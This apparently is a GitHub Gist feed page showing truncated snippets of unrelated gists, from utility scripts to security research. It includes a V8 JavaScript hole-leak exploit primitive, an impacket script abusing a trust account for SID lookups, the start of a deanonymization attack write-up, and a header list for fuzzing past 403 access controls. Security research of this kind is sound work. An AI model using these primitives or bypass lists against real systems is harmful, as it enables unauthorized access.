Ryota Sakai famasoon
@xv0nfers
xv0nfers / chrome-bug-commit-tracker.py
Last active July 4, 2025 07:53
A lightweight Python script that, given a Chrome bug ID, fetches its Stable Channel Update entry from Chrome Releases RSS and lists all related commits from GitHub and Gerrit
#!/usr/bin/env python3
import sys
import json
import requests
import feedparser
import re
BUG_ID = sys.argv[1] if len(sys.argv) > 1 else None
if not BUG_ID or not BUG_ID.isdigit():
    print("Usage: python3 chrome-bug-commit-tracker.py <bug_id>")
@Teach2Breach
Teach2Breach / python_embed.ps1
Created July 2, 2025 17:16
run python on windows without install and with full pip support
# PowerShell script to download and install Python embeddable package with pip
# This script replicates the functionality of the download_extract_python() function
param(
    [string]$PythonVersion = "3.10.11",
    [string]$TargetDir = "C:\Users\Public\python-3.10.11",
    [string]$PythonUrl = "https://www.python.org/ftp/python/3.10.11/python-3.10.11-embed-amd64.zip",
    [string]$PipUrl = "https://bootstrap.pypa.io/get-pip.py"
)
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
@namazso
namazso / SuperReturn.c
Last active June 26, 2025 05:51
SuperReturn
/// Return, but across multiple frames.
///
/// This function unwinds the given number of frames, then sets the return value provided, emulating as if this number
/// of functions returned, with the last one returning the value provided in RetVal. Can be used to hook a callee when
/// you don't have a convenient way to hook it directly and actually just want to stub it out with a return value.
///
/// @param FramesToSkip The number of frames to skip, starting from the current frame.
/// @param RetVal The value to return from the last frame.
/// @param Context Context to start from, in case you want to SuperReturn from somewhere deeper.
DECLSPEC_NOINLINE void SuperReturn(
@ThePirateWhoSmellsOfSunflowers
ThePirateWhoSmellsOfSunflowers / lsarlookupsids3_aes.py
Created February 6, 2025 22:16
Perform a lsarlookupsids3 with a trust account; it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
from impacket.uuid import bin_to_uuidtup
from binascii import unhexlify
from random import randbytes
import sys
# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
# Pure TCP RPC is used (ncacn_ip_tcp option)
# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
# Tested with impacket 0.12.0 on GOAD
@hackermondev
hackermondev / research.md
Last active July 14, 2025 06:34
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platforms

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

// Preconditions
// ----------------------
// (1) The receiver must be a regular object and the key a unique name.
//     This excludes special objects such as globalThis, wasm objects, etc.
// (2) The property to be deleted must be the last property.
// (3) The property to be deleted must be deletable.
//     This excludes non-configurable properties, so no frozen or sealed objects.
// (4) The map must have a back pointer.
//     This excludes prototype maps.
// (5) The last transition must have been caused by adding a property.
### USAGE:
###
### GetTracelogProviderSecurity.ps1 (to get all provider info)
###
### GetTracelogProviderSecurity.ps1 -ProviderName f2e68291-2367-5d51-3488-46f7a0e3f2cf
### (to get the info for 1 provider guid)
##
#
# Provider: f2e68291-2367-5d51-3488-46f7a0e3f2cf
# Control Flags: 45076
@kyleavery
kyleavery / pdf_to_md.py
Created December 1, 2024 23:53
PDF to Markdown
import os
import base64
from concurrent.futures import ThreadPoolExecutor, as_completed
import openai
from pdf2image import convert_from_path
from PIL import Image
@Spix0r
Spix0r / 403-Bypass-Headers-List.txt
Created October 3, 2024 15:24
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers you can fuzz to potentially bypass 403 restrictions.
Allow: CONNECT
Allow: GET
Allow: HEAD
Allow: POST
Allow: TRACE
Client-IP: 0
Client-IP: 0177.0000.0000.0001
Client-IP: 0x7F000001
Client-IP: 10.0.0.0
Client-IP: 10.0.0.1